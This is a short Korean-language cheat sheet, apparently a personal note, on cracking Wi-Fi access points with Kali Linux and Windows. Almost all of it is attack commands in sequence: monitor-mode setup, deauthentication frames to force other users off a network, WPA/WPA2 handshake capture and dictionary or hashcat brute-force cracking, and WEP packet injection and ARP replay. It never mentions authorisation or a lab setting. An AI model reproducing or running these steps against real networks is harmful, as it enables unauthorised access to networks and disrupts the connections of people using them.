Kali linux를 이용한 AP 해킹 (+windows)
iwconfig
ifconfig wlan0 down
[모니터 모드 전환]
airmon-ng check kill : 모드 전환 시 간섭 발생 가능성이 있는 프로세스 종료
airmon-ng start wlan0
iwconfig
[주변 무선랜 스캔]
airodump-ng wlan0mon
[타겟 설정]
airodump-ng wlan0mon --channel 3 --bssid [bssid] -w [filename]
[강제로 다른 사용자 연결 해제]
aireplay-ng 0 [인증 해제 횟수] -a [AP의 MAC주소] -c [접속한 장비의 MAC주소]
[사전 대입, wpa wpa2]
aircrack-ng wpacrack-01.cap -w /usr/share/wordlists/sqlmap.txt
[hashcat 사용]
cap 파일을 hccapx로 확장자 변환
#cap2hccapx.bin [cap file] [hccapx file]
#hashcat -m 2500 -a 3 --force [hccapx file] 0000?d?d?d?d
: "wpa2로 암호화되어있으며, 0000뒤에 숫자4글자인 비밀번호를 bruteforce해라." 라는 의미
기존에 나온 결과 값을 참고하기 위해 --show 옵션 사용 가능
[wep 사용시]
aireplay-ng wlan0mon -1 0 -a [ap 맥주소] -h [랜카드 맥주소] : 패킷인젝션
aireplay-ng wlan0mon -3 -b [ap 맥주소] -h [랜카드 맥주소] : apr request replay 다량의 패킷 유발
data 35000개 이상 모은 후에
aircrack-ng -b [AP 맥주소] [cap file] 실행
안되면 5000개씩 data를 자동으로 더모으고 크랙을 시도함
[windows 환경]
- commview for wifi 설치
- logging 설정 : auto_saving, 200000, 100
- 재생버튼 클릭
- 타겟 설정후 single channel mode로 변경
- 무료버전이므로 위 과정을 수차례 시도하여 데이터 수집
- Log Viewer에서 local commView logs 로드
- export log에서 wireshark tcp dump로 pcap 파일로 변경
>aircrack-ng.exe
index number 입력하면 crack!!
>aircrack-ng.exe -w [password.lst] [name.cap]